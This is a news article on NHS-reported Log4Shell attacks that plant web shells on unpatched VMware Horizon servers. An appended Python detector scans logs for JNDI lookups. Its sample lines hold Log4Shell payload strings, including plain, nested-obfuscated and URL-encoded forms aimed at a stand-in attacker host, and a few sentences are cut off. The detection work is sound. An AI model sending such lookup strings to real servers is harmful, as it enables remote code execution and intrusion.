UK NHS: Threat actor targets VMware Horizon servers using Log4Shell exploits

The security team of the UK National Health Service (NHS) said that it detected an unknown threat actor using the Log4Shell vulnerability to hack VMware Horizon servers and plant web shells for future attacks.

"The web shell can then be used by an attacker to carry out a number of malicious activities such as deploying additional malicious software, data exfiltration, or deployment of ransomware," the NHS team said in a security alert published on Wednesday.

The NHS-reported attacks mark the second time a VMware product has been targeted via the Log4Shell vulnerability, after reports that the Conti ransomware gang abused Log4Shell to compromise VMware vCenter servers last month.

What is Log4Shell

Disclosed on December 9, Log4Shell is a vulnerability in Apache Log4j, a Java library used to add log management capabilities to Java web and desktop apps.

The vulnerability was initially discovered by operators of Minecraft servers, which relied on Log4j for logging, who noticed in late November that someone was using a Log4j exploit to hijack their servers.

Log4j patches were released to fix the flaw and counter the attacks, and VMware was one of the companies that integrated the Log4j fixes into its products to prevent easy exploitation of its software via Log4Shell exploits.

VMware Horizon, a platform for managing and deploying virtual desktops for a company's staff, was one of the many affected VMware products that received a patch to prevent Log4Shell attacks.

NHS discovers Log4Shell attacks on VMware Horizon servers

But the NHS said that despite the patch's availability, it is now seeing attacks that try to identify VMware Horizon servers that haven't been patched.

The NHS's security team said the attacks follow the pattern of the initial Log4Shell exploit (described above), with the attacker sending a JNDI request to a VMware Horizon server.

If the server has not been patched, the attacker's exploit forces the Horizon server to connect via LDAP to a malicious domain, then download and run a PowerShell script that installs a web shell, which acts as a backdoor for future attacks.

To help organizations that run VMware Horizon servers, the UK NHS has released instructions on how to detect possible signs of exploitation.

This advice can be found in the NHS technical report, and we will not be reproducing it here to avoid situations where the NHS updates the code with better detections.

According to CISA, cyber threat actors, including state-sponsored advanced persistent threat (APT) actors, have continued to exploit Log4Shell in unpatched, internet-facing VMware Horizon and. After obtaining initial access and installing XMRig on the VMware Horizon server, the actors used RDP and the built-in Windows user account DefaultAccount to move laterally to a VMware VDI-KMS host.

Flaws in Microsoft and VMware products allowed the attackers to access emails and other documents, and to perform federated authentication across victim.
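The JNDI lookup string that drives the exploit described above, and a first-pass check for it in log data, as an added example. This is my own illustration, not the NHS detection script (which the article deliberately does not reproduce) and not VMware code. It assumes the attacker's lookup string ends up in some field that is written to a text log (a web-server access log is used here); the log lines, the host name attacker.example and the IP addresses are constructed for the example, and the obfuscation forms it collapses (${lower:..}, ${upper:..}, ${..:-default} and URL-encoding) are the commonly documented ones, not an exhaustive list.

```python
"""Detect Log4Shell (CVE-2021-44228) JNDI lookup strings in log lines.

Added example, not NHS or VMware code. The sample lines below are constructed;
the obfuscation handling covers common documented forms only.
"""
import re
import urllib.parse

# Constructed sample log lines: one benign request, one plain JNDI lookup in the
# User-Agent field, one nested ${lower:..}/${::-..} obfuscation, one URL-encoded.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /portal/ HTTP/1.1" 200 "Mozilla/5.0"',
    '198.51.100.7 - - "GET /portal/ HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '198.51.100.8 - - "GET /portal/ HTTP/1.1" 200 "${${lower:j}${::-n}di:${lower:LDAP}://attacker.example/x}"',
    '198.51.100.9 - - "GET /portal/?q=%24%7Bjndi%3Armi%3A%2F%2Fattacker.example%2Fo%7D HTTP/1.1" 404 "-"',
]

# ${lower:X} / ${upper:X} with no further nesting inside the braces.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^{}]*)\}")
# ${anything:-DEFAULT} with no further nesting: an undefined lookup resolves to DEFAULT.
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# What we are actually looking for once the obfuscation has been collapsed.
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|https?)\s*:", re.IGNORECASE)


def normalize_lookup(text: str, max_rounds: int = 20) -> str:
    """Collapse URL-encoding and the common Log4j lookup obfuscations.

    Innermost lookups are rewritten first; the loop repeats until nothing
    changes, so nested forms like ${${lower:j}ndi:...} flatten to ${jndi:...}.
    """
    for _ in range(max_rounds):
        before = text
        text = urllib.parse.unquote(text)
        text = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1) == "lower" else m.group(2).upper(),
            text)
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
        if text == before:
            break
    return text


def find_jndi_lookup(line: str):
    """Return (protocol, normalized_line) if the line carries a JNDI lookup, else None."""
    normalized = normalize_lookup(line)
    m = _JNDI.search(normalized)
    if not m:
        return None
    return m.group(1).lower(), normalized


def scan_log_lines(lines):
    """Return [(line_number, protocol)] for every line that carries a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, start=1):
        found = find_jndi_lookup(line)
        if found:
            hits.append((n, found[0]))
    return hits


if __name__ == "__main__":
    for n, proto in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {n}: JNDI lookup via {proto} -> {normalize_lookup(SAMPLE_LOG_LINES[n - 1])}")
```

A hit on this check means an exploit attempt was logged, not that it succeeded; the chain the article describes gives two further places to confirm that on a Horizon host: outbound LDAP connections from the server to a domain it has no business talking to, and PowerShell execution followed by a new web shell file on disk. The exact indicators the NHS uses are in its technical report, which is the authoritative source to follow.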